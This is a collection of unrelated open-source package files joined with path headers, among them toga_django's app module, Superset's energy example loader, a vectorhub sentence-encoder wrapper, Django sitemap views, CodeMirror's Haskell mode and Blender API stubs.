if res is None:
raise IOError("can't find %s in path" % prog)
return res
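# Usage sketch (illustrative, not part of the original module): builder classes and
# mixins compose with "+" thanks to AddableMixinMetaclass, e.g.
#
#     LS = (Mixin_UseFullProgPath + OptionBuilder)("ls")
#     listing = LS.getoutput("/tmp", all=True)
#
# which resolves "ls" on the PATH and runs "ls --all /tmp", returning its stdout.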
def _setup_signals():
res = {}
for key, value in viewitems(vars(signal)):
        if key.startswith("SIG") and key[3] != "_":  # skip SIG_DFL/SIG_IGN
res[value] = key
return res
_signals = _setup_signals()
def main(args):
pass
def _test(*args, **keywds):
import doctest
doctest.testmod(sys.modules[__name__], *args, **keywds)
if __name__ == "__main__":
if __debug__:
_test()
sys.exit(main(sys.argv[1:])) | PypiClean |
/toga_django-0.2.15-py3-none-any.whl/toga_django/app.py | import base64
import marshal
import os
import py_compile
import tempfile
from django.conf.urls import url
from django.shortcuts import render
from django.utils.safestring import mark_safe
from toga.interface.app import App as AppInterface
from toga.interface.widgets.base import Widget
from .window import Window
from .bootstrap import bootstrap
from . import impl
class MainWindow(Window):
pass
class App(AppInterface):
_MAIN_WINDOW_CLASS = MainWindow
def __init__(self, name, app_id, icon=None, id=None, startup=None):
# Set the icon for the app
# Icon.app_icon = Icon.load(icon, default=TIBERIUS_ICON)
self.windows = []
super().__init__(
name=name,
app_id=app_id,
# icon=Icon.app_icon,
id=id,
startup=startup,
)
self._startup()
def _startup(self):
self.startup()
def main_loop(self):
pass
# ====
# def materialize(self):
# app = render.App(self.name, self.app_id, self.ports)
# app.main_window = self.main_window.materialize()
# for win_id, win in self.windows:
# app.windows.append(win.materialize())
# return app
def __str__(self):
return mark_safe(self.main_window._impl.__html__())
def get_urls(self):
urlpatterns = [
url(r'^$', self.home, name='home'),
] + self.main_window.get_urls()
for win_id, window in self.windows:
urlpatterns += window.get_urls()
return urlpatterns
@property
def urls(self):
return self.get_urls(), 'toga', self.name
@property
def ports(self):
return ",".join(
"%s=%s" % (name, widget.id)
for name, widget in self.__dict__.items()
if isinstance(widget, Widget)
)
def home(self, request):
# app = self.app.materialize()
# if app.main_window.id == self.id:
# window = app.main_window
# else:
# try:
# window = app.windows[self.id]
# except KeyError:
# raise Exception("Unknown window")
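        # Compile the client-side Toga implementation modules to CPython bytecode and
        # base64-encode them so they can be embedded in the rendered page (presumably
        # for a JavaScript-hosted Python VM to execute in the browser).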
sourcefile = os.path.join(os.path.dirname(__file__), 'impl', '__init__.py')
fd, tempname = tempfile.mkstemp()
py_compile.compile(sourcefile, cfile=tempname, doraise=True)
with open(os.path.join(os.path.dirname(sourcefile), tempname), 'rb') as compiled:
toga = base64.encodebytes(compiled.read())
widgets = {}
for widget in ["app", "window", "box", "button", "label", "textinput", "webview"]:
sourcefile = os.path.join(os.path.dirname(__file__), 'impl', "%s.py" % widget)
fd, tempname = tempfile.mkstemp()
py_compile.compile(sourcefile, cfile=tempname, doraise=True)
with open(os.path.join(os.path.dirname(sourcefile), tempname), 'rb') as compiled:
bytecode = base64.encodebytes(compiled.read())
widgets['toga.%s' % widget] = {
'filename': sourcefile,
'bytecode': bytecode,
}
context = {
'toga': toga,
'widgets': widgets,
'bootstrap': base64.encodebytes(b'\xee\x0c\r\n00000000' + marshal.dumps(bootstrap.__code__)).strip(),
'app': self,
'callbacks': {
# 'sample': base64.encodebytes(b'\x08\x1c\xe8VU\x00\x00\x00' + marshal.dumps(sample.__code__)).strip()
'%s-%s' % (widget, message): {
'filename': '<string>',
'bytecode': base64.encodebytes(b'\xee\x0c\r\n00000000' + marshal.dumps(callback.__code__)).strip()
}
for (widget, message), callback in self.main_window.callbacks.items()
}
}
return render(request, 'toga/app.html', context) | PypiClean |
/wpt-superset-1.0.1.tar.gz/wpt-superset-1.0.1/superset/data/energy.py | """Loads datasets, dashboards and slices in a new superset instance"""
# pylint: disable=C,R,W
import gzip
import os
import textwrap
import pandas as pd
from sqlalchemy import Float, String
from superset import db
from superset.connectors.sqla.models import SqlMetric
from superset.utils import core as utils
from .helpers import DATA_FOLDER, merge_slice, misc_dash_slices, Slice, TBL
def load_energy():
"""Loads an energy related dataset to use with sankey and graphs"""
tbl_name = 'energy_usage'
with gzip.open(os.path.join(DATA_FOLDER, 'energy.json.gz')) as f:
pdf = pd.read_json(f)
pdf.to_sql(
tbl_name,
db.engine,
if_exists='replace',
chunksize=500,
dtype={
'source': String(255),
'target': String(255),
'value': Float(),
},
index=False)
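    # Register (or refresh) the table in Superset's metadata, attach a SUM(value)
    # metric, and then create the example Sankey, force-layout and heatmap slices.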
    print('Creating table [energy_usage] reference')
tbl = db.session.query(TBL).filter_by(table_name=tbl_name).first()
if not tbl:
tbl = TBL(table_name=tbl_name)
tbl.description = 'Energy consumption'
tbl.database = utils.get_or_create_main_db()
if not any(col.metric_name == 'sum__value' for col in tbl.metrics):
tbl.metrics.append(SqlMetric(
metric_name='sum__value',
expression='SUM(value)',
))
db.session.merge(tbl)
db.session.commit()
tbl.fetch_metadata()
slc = Slice(
slice_name='Energy Sankey',
viz_type='sankey',
datasource_type='table',
datasource_id=tbl.id,
params=textwrap.dedent("""\
{
"collapsed_fieldsets": "",
"groupby": [
"source",
"target"
],
"having": "",
"metric": "sum__value",
"row_limit": "5000",
"slice_name": "Energy Sankey",
"viz_type": "sankey",
"where": ""
}
"""),
)
misc_dash_slices.add(slc.slice_name)
merge_slice(slc)
slc = Slice(
slice_name='Energy Force Layout',
viz_type='directed_force',
datasource_type='table',
datasource_id=tbl.id,
params=textwrap.dedent("""\
{
"charge": "-500",
"collapsed_fieldsets": "",
"groupby": [
"source",
"target"
],
"having": "",
"link_length": "200",
"metric": "sum__value",
"row_limit": "5000",
"slice_name": "Force",
"viz_type": "directed_force",
"where": ""
}
"""),
)
misc_dash_slices.add(slc.slice_name)
merge_slice(slc)
slc = Slice(
slice_name='Heatmap',
viz_type='heatmap',
datasource_type='table',
datasource_id=tbl.id,
params=textwrap.dedent("""\
{
"all_columns_x": "source",
"all_columns_y": "target",
"canvas_image_rendering": "pixelated",
"collapsed_fieldsets": "",
"having": "",
"linear_color_scheme": "blue_white_yellow",
"metric": "sum__value",
"normalize_across": "heatmap",
"slice_name": "Heatmap",
"viz_type": "heatmap",
"where": "",
"xscale_interval": "1",
"yscale_interval": "1"
}
"""),
)
misc_dash_slices.add(slc.slice_name)
merge_slice(slc) | PypiClean |
/vectorhub_nightly-1.2.0.2021.6.2.1.17.47.427274-py3-none-any.whl/vectorhub/encoders/text/tfhub/use_lite.py | import warnings
import numpy as np
from datetime import date
from ....base import catch_vector_errors
from ....doc_utils import ModelDefinition
from ....import_utils import is_all_dependency_installed
from ....models_dict import MODEL_REQUIREMENTS
from ..base import BaseText2Vec
from .use import USE2Vec
if is_all_dependency_installed(MODEL_REQUIREMENTS['encoders-text-tfhub-use-multi']):
    import tensorflow as tf
    import tensorflow_hub as hub  # needed by init() below
    import sentencepiece as spm  # needed by init() below
    from tensorflow.python.framework.errors_impl import NotFoundError
try:
import tensorflow_text
except NotFoundError:
print('The installed Tensorflow Text version is not aligned with tensorflow, make sure that tensorflow-text version is same version as tensorflow')
USELiteModelDefinition = ModelDefinition(markdown_filepath='encoders/text/tfhub/use_lite.md')
class USELite2Vec(BaseText2Vec):
definition = USELiteModelDefinition
urls = {
"https://tfhub.dev/google/universal-sentence-encoder-lite/2": {'vector_length': 512}
}
def __init__(self, model_url: str = 'https://tfhub.dev/google/universal-sentence-encoder-lite/2'):
list_of_urls = [
"https://tfhub.dev/google/universal-sentence-encoder-lite/2",
]
self.validate_model_url(model_url, list_of_urls)
self.vector_length = 512
        warnings.warn("Using USELite2Vec requires disabling TF2 behaviours via tf.disable_v2_behavior(), which can break other models run in the same process. If you are OK with this, call model.init() to disable TF2 and enable USELite2Vec.")
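    # encode()/bulk_encode() only work after init() has been called: init() builds the
    # TF1 graph, loads the hub module and the SentencePiece tokenizer used below.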
def init(self):
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
self.input_placeholder = tf.sparse_placeholder(tf.int64, shape=[None, None])
self.model = hub.Module("https://tfhub.dev/google/universal-sentence-encoder-lite/2")
        self.encodings = self.model(inputs=dict(
values=self.input_placeholder.values,
indices=self.input_placeholder.indices,
dense_shape=self.input_placeholder.dense_shape
))
with tf.Session() as sess:
            spm_path = sess.run(self.model(signature="spm_path"))
self.sp = spm.SentencePieceProcessor()
self.sp.Load(spm_path)
def process_texts(self, texts):
ids = [self.sp.EncodeAsIds(x) for x in texts]
return (
[item for sublist in ids for item in sublist],
[[row,col] for row in range(len(ids)) for col in range(len(ids[row]))],
(len(ids), max(len(x) for x in ids))
)
@catch_vector_errors
def encode(self, text):
values, indices, dense_shape = self.process_texts([text])
with tf.Session() as session:
session.run([tf.global_variables_initializer(), tf.tables_initializer()])
message_embeddings = session.run(self.encodings,
feed_dict={self.input_placeholder.values: values,
self.input_placeholder.indices: indices,
self.input_placeholder.dense_shape: dense_shape})
return np.array(message_embeddings)[0].tolist()
@catch_vector_errors
def bulk_encode(self, texts, threads=10, chunks=100):
values, indices, dense_shape = self.process_texts(texts)
with tf.Session() as session:
session.run([tf.global_variables_initializer(), tf.tables_initializer()])
message_embeddings = session.run(self.encodings,
feed_dict={self.input_placeholder.values: values,
self.input_placeholder.indices: indices,
self.input_placeholder.dense_shape: dense_shape})
return np.array(message_embeddings).tolist() | PypiClean |
/django_linux-2.2.8-py3-none-any.whl/django/contrib/sitemaps/views.py | import datetime
from calendar import timegm
from functools import wraps
from django.contrib.sites.shortcuts import get_current_site
from django.core.paginator import EmptyPage, PageNotAnInteger
from django.http import Http404
from django.template.response import TemplateResponse
from django.urls import reverse
from django.utils.http import http_date
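# Decorator shared by both views below: adds an X-Robots-Tag header so the sitemap
# pages themselves are not indexed or archived by search engines.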
def x_robots_tag(func):
@wraps(func)
def inner(request, *args, **kwargs):
response = func(request, *args, **kwargs)
response['X-Robots-Tag'] = 'noindex, noodp, noarchive'
return response
return inner
@x_robots_tag
def index(request, sitemaps,
template_name='sitemap_index.xml', content_type='application/xml',
sitemap_url_name='django.contrib.sitemaps.views.sitemap'):
req_protocol = request.scheme
req_site = get_current_site(request)
sites = [] # all sections' sitemap URLs
for section, site in sitemaps.items():
# For each section label, add links of all pages of its sitemap
# (usually generated by the `sitemap` view).
if callable(site):
site = site()
protocol = req_protocol if site.protocol is None else site.protocol
sitemap_url = reverse(sitemap_url_name, kwargs={'section': section})
absolute_url = '%s://%s%s' % (protocol, req_site.domain, sitemap_url)
sites.append(absolute_url)
# Add links to all pages of the sitemap.
for page in range(2, site.paginator.num_pages + 1):
sites.append('%s?p=%s' % (absolute_url, page))
return TemplateResponse(request, template_name, {'sitemaps': sites},
content_type=content_type)
@x_robots_tag
def sitemap(request, sitemaps, section=None,
template_name='sitemap.xml', content_type='application/xml'):
req_protocol = request.scheme
req_site = get_current_site(request)
if section is not None:
if section not in sitemaps:
raise Http404("No sitemap available for section: %r" % section)
maps = [sitemaps[section]]
else:
maps = sitemaps.values()
page = request.GET.get("p", 1)
lastmod = None
all_sites_lastmod = True
urls = []
for site in maps:
try:
if callable(site):
site = site()
urls.extend(site.get_urls(page=page, site=req_site,
protocol=req_protocol))
if all_sites_lastmod:
site_lastmod = getattr(site, 'latest_lastmod', None)
if site_lastmod is not None:
site_lastmod = (
site_lastmod.utctimetuple() if isinstance(site_lastmod, datetime.datetime)
else site_lastmod.timetuple()
)
lastmod = site_lastmod if lastmod is None else max(lastmod, site_lastmod)
else:
all_sites_lastmod = False
except EmptyPage:
raise Http404("Page %s empty" % page)
except PageNotAnInteger:
raise Http404("No page '%s'" % page)
response = TemplateResponse(request, template_name, {'urlset': urls},
content_type=content_type)
if all_sites_lastmod and lastmod is not None:
# if lastmod is defined for all sites, set header so as
# ConditionalGetMiddleware is able to send 304 NOT MODIFIED
response['Last-Modified'] = http_date(timegm(lastmod))
return response | PypiClean |
/pytello-hsu-3.0.0.tar.gz/pytello-hsu-3.0.0/README.md | # Read Me
For this to work you need Python 3.6 or above and Windows 10. At the beginning of the file you create, you need to add the following command:
import pytello-hsu
Also to get this on your computer you need to do the following command:
pip install pytello-hsu
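For reference, a complete minimal script using the "init()" call described below might look like the following sketch. Note that the import name is assumed here to be pytello_hsu (with an underscore), since a hyphen is not valid in a Python import; check DOCUMENTATION.md for the exact name.

```python
# Minimal sketch, assuming the module imports as pytello_hsu and that init()
# is the required setup call mentioned in this README.
import pytello_hsu

pytello_hsu.init()  # must run before any other commands
```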
When programming, you must use the "init()" command at the beginning of the file if you want the program to work, unless you know what you're doing and how the program works. To understand how the program works further, look at DOCUMENTATION.md. | PypiClean
/itch-framework-0.0.1.tar.gz/itch-framework-0.0.1/itch/stage.py | import itch.costume
from itch.event_receiver import EventReceiver
import itch.sprite
import pygame
import itch.data_view
import itch.utils
class DataContainer:
pass
class PendingEvent:
def __init__(self, name, mouse_coords):
self.name = name
self.mouse_coords = mouse_coords
class Stage(EventReceiver):
STAGE_WIDTH = 480
STAGE_HEIGHT = 360
WHITE = (255, 255, 255)
def __init__(self, *image_sources, scheduler):
super().__init__(scheduler)
self._costume = None
self.load_backdrops(*image_sources)
self.sprite_list = []
self.data_container = DataContainer()
self.data_views = []
self._pending_events = []
def load_backdrops(self, *image_sources):
self._costume = itch.costume.Costume(image_sources)
def render_in(self, screen):
screen.fill(Stage.WHITE)
if self._costume.current_image():
screen.blit(self._costume.current_image(), (0, 0))
for sprite in self.sprite_list:
sprite.render_in(screen)
for dv in self.data_views:
dv.render_in(screen)
def switch_backdrop_to(self, name):
self._costume.select_named(name)
self._schedule()
def next_backdrop(self):
self._costume.next_costume()
self._schedule()
def receivers(self):
return [self] + self.sprite_list
def create_sprite(self, x=0, y=0, *image_sources):
sprite = itch.sprite.Sprite(image_sources, x, y, self, self._scheduler)
self.sprite_list.append(sprite)
return sprite
def create_data(self, name, value):
setattr(self.data_container, name, value)
self.data_views.append(itch.data_view.DataView(0, 0, name, self.data_container, self._scheduler))
def receiver_at(self, coords):
underneath = list(filter(lambda s: s.hit_test(coords), self.sprite_list))
if len(underneath) > 0:
return underneath[-1]
else:
return self
def bring_to_front(self, sprite):
self.sprite_list.remove(sprite)
self.sprite_list.append(sprite)
self._schedule()
def send_back_layers(self, sprite, number):
current = self.sprite_list.index(sprite)
new_pos = max(0, current - number)
self.sprite_list.remove(sprite)
self.sprite_list.insert(new_pos, sprite)
self._schedule()
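    # Builds a pygame mask of the stage as rendered without ``no_render_sprite``,
    # filtered by ``color``; used for colour-based collision checks between a sprite
    # and the rest of the scene.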
def mask_without_sprite_filtered_by_color(self, no_render_sprite, color):
target = (0, 0, 0, 255)
threshold = (8, 8, 8, 0)
render_surface = pygame.Surface((itch.Stage.STAGE_WIDTH, itch.Stage.STAGE_HEIGHT), pygame.SRCALPHA)
threshold_surface = pygame.Surface((itch.Stage.STAGE_WIDTH, itch.Stage.STAGE_HEIGHT), pygame.SRCALPHA)
if self._costume.current_image():
render_surface.blit(self._costume.current_image(), (0, 0))
for sprite in self.sprite_list:
if sprite != no_render_sprite:
sprite.render_in(render_surface)
pygame.transform.threshold(threshold_surface, render_surface, list(color) + [0], threshold, target, True)
mask = pygame.mask.from_surface(threshold_surface)
mask.invert()
return mask
def broadcast(self, event_name):
self.system_broadcast("when_i_receive_" + event_name)
def system_broadcast(self, event_name):
self._pending_events.append(PendingEvent(event_name, itch.utils.read_mouse()))
def fire_all_events(self):
for pending_event in self._pending_events:
if pending_event.name == "mouse_clicked":
under = self.receiver_at(pending_event.mouse_coords)
if isinstance(under, itch.sprite.Sprite):
under.trigger_event("when_this_sprite_clicked")
else:
under.trigger_event("when_stage_clicked")
else:
for receiver in self.receivers():
receiver.trigger_event(pending_event.name)
self._pending_events.clear()
def run_all_tasks_until_reschedule(self):
for receiver in self.receivers():
receiver.run_tasks_until_reschedule() | PypiClean |
/flask-magic-0.0.53.tar.gz/flask-magic-0.0.53/flask_magic/plugins/publisher/static/Magic/Plugin/Publisher/mdeditor/bower_components/codemirror/mode/haskell/haskell.js | CodeMirror.defineMode("haskell", function() {
function switchState(source, setState, f) {
setState(f);
return f(source, setState);
}
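  // Each tokenizer state below is a function(source, setState) that consumes
  // characters from the stream and returns a CSS token class; switchState hands
  // control to a new state (e.g. on entering a string or a nested comment).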
// These should all be Unicode extended, as per the Haskell 2010 report
var smallRE = /[a-z_]/;
var largeRE = /[A-Z]/;
var digitRE = /[0-9]/;
var hexitRE = /[0-9A-Fa-f]/;
var octitRE = /[0-7]/;
var idRE = /[a-z_A-Z0-9']/;
var symbolRE = /[-!#$%&*+.\/<=>?@\\^|~:]/;
var specialRE = /[(),;[\]`{}]/;
var whiteCharRE = /[ \t\v\f]/; // newlines are handled in tokenizer
function normal(source, setState) {
if (source.eatWhile(whiteCharRE)) {
return null;
}
var ch = source.next();
if (specialRE.test(ch)) {
if (ch == '{' && source.eat('-')) {
var t = "comment";
if (source.eat('#')) {
t = "meta";
}
return switchState(source, setState, ncomment(t, 1));
}
return null;
}
if (ch == '\'') {
if (source.eat('\\')) {
source.next(); // should handle other escapes here
}
else {
source.next();
}
if (source.eat('\'')) {
return "string";
}
return "error";
}
if (ch == '"') {
return switchState(source, setState, stringLiteral);
}
if (largeRE.test(ch)) {
source.eatWhile(idRE);
if (source.eat('.')) {
return "qualifier";
}
return "variable-2";
}
if (smallRE.test(ch)) {
source.eatWhile(idRE);
return "variable";
}
if (digitRE.test(ch)) {
if (ch == '0') {
if (source.eat(/[xX]/)) {
source.eatWhile(hexitRE); // should require at least 1
return "integer";
}
if (source.eat(/[oO]/)) {
source.eatWhile(octitRE); // should require at least 1
return "number";
}
}
source.eatWhile(digitRE);
var t = "number";
if (source.eat('.')) {
t = "number";
source.eatWhile(digitRE); // should require at least 1
}
if (source.eat(/[eE]/)) {
t = "number";
source.eat(/[-+]/);
source.eatWhile(digitRE); // should require at least 1
}
return t;
}
if (symbolRE.test(ch)) {
if (ch == '-' && source.eat(/-/)) {
source.eatWhile(/-/);
if (!source.eat(symbolRE)) {
source.skipToEnd();
return "comment";
}
}
var t = "variable";
if (ch == ':') {
t = "variable-2";
}
source.eatWhile(symbolRE);
return t;
}
return "error";
}
function ncomment(type, nest) {
if (nest == 0) {
return normal;
}
return function(source, setState) {
var currNest = nest;
while (!source.eol()) {
var ch = source.next();
if (ch == '{' && source.eat('-')) {
++currNest;
}
else if (ch == '-' && source.eat('}')) {
--currNest;
if (currNest == 0) {
setState(normal);
return type;
}
}
}
setState(ncomment(type, currNest));
return type;
};
}
function stringLiteral(source, setState) {
while (!source.eol()) {
var ch = source.next();
if (ch == '"') {
setState(normal);
return "string";
}
if (ch == '\\') {
if (source.eol() || source.eat(whiteCharRE)) {
setState(stringGap);
return "string";
}
if (source.eat('&')) {
}
else {
source.next(); // should handle other escapes here
}
}
}
setState(normal);
return "error";
}
function stringGap(source, setState) {
if (source.eat('\\')) {
return switchState(source, setState, stringLiteral);
}
source.next();
setState(normal);
return "error";
}
var wellKnownWords = (function() {
var wkw = {};
function setType(t) {
return function () {
for (var i = 0; i < arguments.length; i++)
wkw[arguments[i]] = t;
};
}
setType("keyword")(
"case", "class", "data", "default", "deriving", "do", "else", "foreign",
"if", "import", "in", "infix", "infixl", "infixr", "instance", "let",
"module", "newtype", "of", "then", "type", "where", "_");
setType("keyword")(
"\.\.", ":", "::", "=", "\\", "\"", "<-", "->", "@", "~", "=>");
setType("builtin")(
"!!", "$!", "$", "&&", "+", "++", "-", ".", "/", "/=", "<", "<=", "=<<",
"==", ">", ">=", ">>", ">>=", "^", "^^", "||", "*", "**");
setType("builtin")(
"Bool", "Bounded", "Char", "Double", "EQ", "Either", "Enum", "Eq",
"False", "FilePath", "Float", "Floating", "Fractional", "Functor", "GT",
"IO", "IOError", "Int", "Integer", "Integral", "Just", "LT", "Left",
"Maybe", "Monad", "Nothing", "Num", "Ord", "Ordering", "Rational", "Read",
"ReadS", "Real", "RealFloat", "RealFrac", "Right", "Show", "ShowS",
"String", "True");
setType("builtin")(
"abs", "acos", "acosh", "all", "and", "any", "appendFile", "asTypeOf",
"asin", "asinh", "atan", "atan2", "atanh", "break", "catch", "ceiling",
"compare", "concat", "concatMap", "const", "cos", "cosh", "curry",
"cycle", "decodeFloat", "div", "divMod", "drop", "dropWhile", "either",
"elem", "encodeFloat", "enumFrom", "enumFromThen", "enumFromThenTo",
"enumFromTo", "error", "even", "exp", "exponent", "fail", "filter",
"flip", "floatDigits", "floatRadix", "floatRange", "floor", "fmap",
"foldl", "foldl1", "foldr", "foldr1", "fromEnum", "fromInteger",
"fromIntegral", "fromRational", "fst", "gcd", "getChar", "getContents",
"getLine", "head", "id", "init", "interact", "ioError", "isDenormalized",
"isIEEE", "isInfinite", "isNaN", "isNegativeZero", "iterate", "last",
"lcm", "length", "lex", "lines", "log", "logBase", "lookup", "map",
"mapM", "mapM_", "max", "maxBound", "maximum", "maybe", "min", "minBound",
"minimum", "mod", "negate", "not", "notElem", "null", "odd", "or",
"otherwise", "pi", "pred", "print", "product", "properFraction",
"putChar", "putStr", "putStrLn", "quot", "quotRem", "read", "readFile",
"readIO", "readList", "readLn", "readParen", "reads", "readsPrec",
"realToFrac", "recip", "rem", "repeat", "replicate", "return", "reverse",
"round", "scaleFloat", "scanl", "scanl1", "scanr", "scanr1", "seq",
"sequence", "sequence_", "show", "showChar", "showList", "showParen",
"showString", "shows", "showsPrec", "significand", "signum", "sin",
"sinh", "snd", "span", "splitAt", "sqrt", "subtract", "succ", "sum",
"tail", "take", "takeWhile", "tan", "tanh", "toEnum", "toInteger",
"toRational", "truncate", "uncurry", "undefined", "unlines", "until",
"unwords", "unzip", "unzip3", "userError", "words", "writeFile", "zip",
"zip3", "zipWith", "zipWith3");
return wkw;
})();
return {
startState: function () { return { f: normal }; },
copyState: function (s) { return { f: s.f }; },
token: function(stream, state) {
var t = state.f(stream, function(s) { state.f = s; });
var w = stream.current();
return (w in wellKnownWords) ? wellKnownWords[w] : t;
},
blockCommentStart: "{-",
blockCommentEnd: "-}",
lineComment: "--"
};
});
CodeMirror.defineMIME("text/x-haskell", "haskell"); | PypiClean |
/fake_bpy_module_2.82-20230117-py3-none-any.whl/bl_ui/properties_data_speaker.py | import sys
import typing
import bpy_types
import rna_prop_ui
GenericType = typing.TypeVar("GenericType")
class DataButtonsPanel:
bl_context = None
''' '''
bl_region_type = None
''' '''
bl_space_type = None
''' '''
def poll(self, context):
'''
'''
pass
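# Note: fake_bpy_module provides import-time stubs for IDE autocompletion only; the
# panel classes below mirror Blender's bl_ui API and every method body is an empty
# ``pass`` on purpose.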
class DATA_PT_cone(DataButtonsPanel, bpy_types.Panel, bpy_types._GenericUI):
COMPAT_ENGINES = None
''' '''
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class DATA_PT_context_speaker(DataButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
COMPAT_ENGINES = None
''' '''
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class DATA_PT_custom_props_speaker(DataButtonsPanel, rna_prop_ui.PropertyPanel,
bpy_types.Panel, bpy_types._GenericUI):
COMPAT_ENGINES = None
''' '''
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_order = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class DATA_PT_distance(DataButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
COMPAT_ENGINES = None
''' '''
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class DATA_PT_speaker(DataButtonsPanel, bpy_types.Panel, bpy_types._GenericUI):
COMPAT_ENGINES = None
''' '''
bl_context = None
''' '''
bl_label = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass | PypiClean |
/ansible-8.3.0-py3-none-any.whl/ansible_collections/ibm/spectrum_virtualize/plugins/modules/ibm_sv_manage_snapshotpolicy.py |
# Copyright (C) 2022 IBM CORPORATION
# Author(s): Shilpi Jain <shilpi.jain1@ibm.com>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
